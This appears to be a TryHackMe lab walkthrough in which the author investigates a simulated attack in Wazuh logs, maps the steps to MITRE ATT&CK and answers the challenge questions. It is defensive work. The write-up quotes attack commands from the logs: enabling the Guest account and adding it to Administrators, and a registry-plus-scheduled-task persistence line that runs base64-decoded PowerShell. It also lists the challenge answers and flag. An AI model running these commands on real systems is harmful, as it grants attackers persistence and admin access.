Monday Monitor
TryHackMe Challenge Walkthrough
Challenge Overview
Swiftspend Finance, a modern fintech company, is testing its new endpoint monitoring setup using Wazuh and Sysmon. Your job is to investigate simulated attack activity from April 29, 2024, between 12:00 PM and 8:00 PM. You’ll use the Wazuh dashboard and saved queries to detect suspicious process behavior, persistence techniques, credential dumping, and data exfiltration attempts.
Threat Analysis Summary
Tools Used
- Wazuh
- CyberChef
- MITRE ATT&CK
Chain Attack Overview
Initial Access
– Malicious .xlsm downloaded via PowerShell (Invoke-WebRequest)
– Filename disguise: SwiftSpend_Financial_Expenses.xlsm → actual: PhishingAttachment.xlsm
– Technique: T1566.001 – Spearphishing Attachment
Execution
– PowerShell launched with -ExecutionPolicy Bypass, encoded commands
– Additional payloads downloaded and run
– Technique: T1059.001 – PowerShell
Persistence
– Registry entry added with obfuscated payload
– Scheduled task set to run daily at 12:34
– Technique: T1053.005 – Scheduled Task
Defense Evasion
– Base64 encoding and renamed binaries (memotech.exe, frundll32.exe)
– Technique: T1027 – Obfuscated Files or Information
Credential Access
– Multiple dumpers: mimikatz, nanodump, xordump, cmdkey, rundll32 keymgr
– Guest account activated and added to Administrators
– Technique: T1003.001 – LSASS Dumping, T1555.003 – Credential Manager Access
Privilege Escalation
– Guest account renamed to I_AM_MONITOR1NG and escalated
– Technique: T1136.001 – Create/Modify User Account
Exfiltration
– Files and possible flags exfiltrated via rclone
– Additional data sent via Pastebin API
– Technique: T1567.002 – Exfiltration to Cloud Storage
MITRE ATT&CK Mapping
Phase
ID
Technique name
Description
Initial Access
T1566.001
Phishing: Spearphishing Attachment
Downloaded .xlsm file disguised as financial spreadsheet
Execution
T1059.001
Command and Scripting Interpreter: PowerShell
PowerShell executes commands and downloads additional payloads
Persistence
T1053.005
Scheduled Task/Job: Scheduled Task
Task created to auto-execute obfuscated PowerShell at 12:34
Defense Evasion
T1027
Obfuscated Files or Information
Base64-encoded command hidden in registry
Credential Access
T1003.001
OS Credential Dumping: LSASS Memory
memotech.exe used to dump creds
Exfiltration
T1567.002
Exfiltration to Cloud Storage
PowerShell used `rclone` and Pastebin to exfiltrate data
Reference: [MITRE ATT&CK Navigator] ( https://attack.mitre.org/ )
Initial Recon
Let’s kick things off with the universal SIEM mood-lifter:
Wazuh Query:
powershell
Because if anything shady happens on Windows, chances are it involves PowerShell.
To make events easier to read, I pulled:
- win.eventdata.commandline
- data.win.eventdata.parentProcessId
- data.win.eventdata.processId
To track the chain of events and get a sense of what this chaos is about.
And what’s the source of this mischief?
Atomic Red Team playing red flag simulator:
- T1003 .001 Credential Dumping parade:
- procdump.exe, nanodump.x64.exe, createdump.exe
- The usual suspects: mimikatz.exe and its clone-y sibling memotech.exe
- Bonus: xordump.exe, Outflank-Dumpert.exe
- T1053.005 – Persistence Setup
- Because if you’re going to break in, at least leave a scheduled task behind to keep the door open.
Macro Mayhem & Fake Files
Somewhere in this noisy mess:
- PowerShell pulls SwiftSpend_Financial_Expenses.xlsm to a TEMP folder via Invoke-WebRequest
- But the log betrays the real filename: PhishingAttachment.xlsm — because subtlety is for amateurs
- We also saw runWallpaperSetup.cmd — not suspicious at all — and a bunch of whoami.exe spam to check context (because even attackers have identity issues)
Credential Bonanza Continues
The chain from PID 2980 continues with more credential-hungry behavior:
- cmdkey.exe and rundll32.exe keymgr,KRShowKeyMgr – used to query stored credentials
- Oddly, we see frundll32.exe – either a typo or renamed LOLBin to avoid detection
- whoami, hostname, and various local enumeration loops
- We even see get-childitem and dir pointed at C:\Users\ — probably hunting for juicy files
- Multiple redundant checks like if (Test-Path …) for credential dumping tools — possibly part of Atomic Red Team test scaffolding or just plain indecision
Deep Dive – PID 2980’s Family Drama
Just because we’re nosy and already deep in the rabbit hole, we queried:
Wazuh Query:
data.win.eventdata.parentProcessId: 2980 OR data.win.eventdata.processId: 2980
We get:
- 3 logs: Executable file dropped in folder commonly used by malware”
- A flood of whoami.exe – just making sure we’re still compromised
- Confirmation: PhishingAttachment.xlsm = renamed SwiftSpend_Financial_Expenses.xlsm
Scheduled Persistence & Registry Magic
Roughly four minutes later, a macro triggers this: “Possible Office Macro Started: C:\Windows\System32\cmd.exe”
Which executes:
• A registry add for persistence
• A scheduled task using schtasks.exe /CREATE — runs daily at 12:34
The registry value contains this Base64: cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0
Decoded with CyberChef: ping www.youarevulnerable.thm
Yes — the attacker literally trolled us with a passive-aggressive ICMP echo. Respect.
Credential Dumping: Still Not Sure Which One to Use
The attacker seems… undecided. So they try multiple LSASS dumpers again, because maybe the sixth time’s the charm.
Let’s Mess with the Guest Account
The attacker now enables and escalates the Guest account:
net user guest /active:yes
net user guest I_AM_MONITOR1NG
net localgroup Administrators guest /add
Guest gets renamed and promoted.
I_AM_MONITOR1NG — okay, hacker. We see you.
John Sterling Gets PTH’d
Finally, memotech.exe (aka off-brand Mimikatz) performs a Pass-the-Hash on john.sterling, using NTLM.
Notepad & Phishing Proof
After stealing credentials, our shiny new admin uses NOTEPAD.EXE to read:
• confidential.txt
• Possibly tied to T1566.001 – Spearphishing Attachment
Also, this chain includes event 4792 — which likely launched the exfiltration task.
The Attacker’s Plan, Recapped:
1. Initial Access – Macro-based Office execution
2. Credential Dumping– mimikatz, nanodump, memotech, all the usual suspects
3.Persistence– Registry key + Scheduled Task
4. Privilege Escalation – Activate + promote Guest
5. Credential Abuse – cmdkey, keymgr, Notepad for the win
6. Exfiltration – rclone and Pastebin API
7. Sarcasm Injection – ICMP pings + cheeky THM flag
Q & A
Q1: Initial access was established using a downloaded file. What is the file name saved on the host?
Answer
SwiftSpend_Financial_Expenses.xlsm
Q2: What is the full command run to create a scheduled task?
Answer
“cmd.exe” /c “reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN “ATOMIC-T1053.005” /TR “cmd /c start /min \”\” powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))” /sc daily /st 12:34″
Q3: What time is the scheduled task meant to run?
Answer
12:34
Q4: What was encoded?
Answer
ping www.youarevulnerable.thm
Q5: What password was set for the new user account?
Answer
I_AM_M0NIT0R1NG
Q6: What is the name of the .exe that was used to dump credentials?
Answer
memotech.exe
Q7: Data was exfiltrated from the host. What was the flag that was part of the data?
Answer
THM{M0N1T0R_1$_1N_3FF3CT}
Conclusion
So what did we learn?
– PowerShell is still everyone’s favorite blunt instrument
– Dumping LSASS is apparently a team sport
– Guest accounts should come with a “do not disturb” sign
– And if someone sends you a macro-laced Excel sheet named PhishingAttachment.xlsm… maybe don’t open it
In the end, the attacker left behind scheduled tasks, renamed LOLBins, multiple exfil routes, and an actual ping to youarevulnerable.thm — just in case we missed the message.
Mission accomplished: we chased down every log, connected every dot, and ruined the attacker’s quiet little Monday.
On to the next mess
$ Whoami
Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.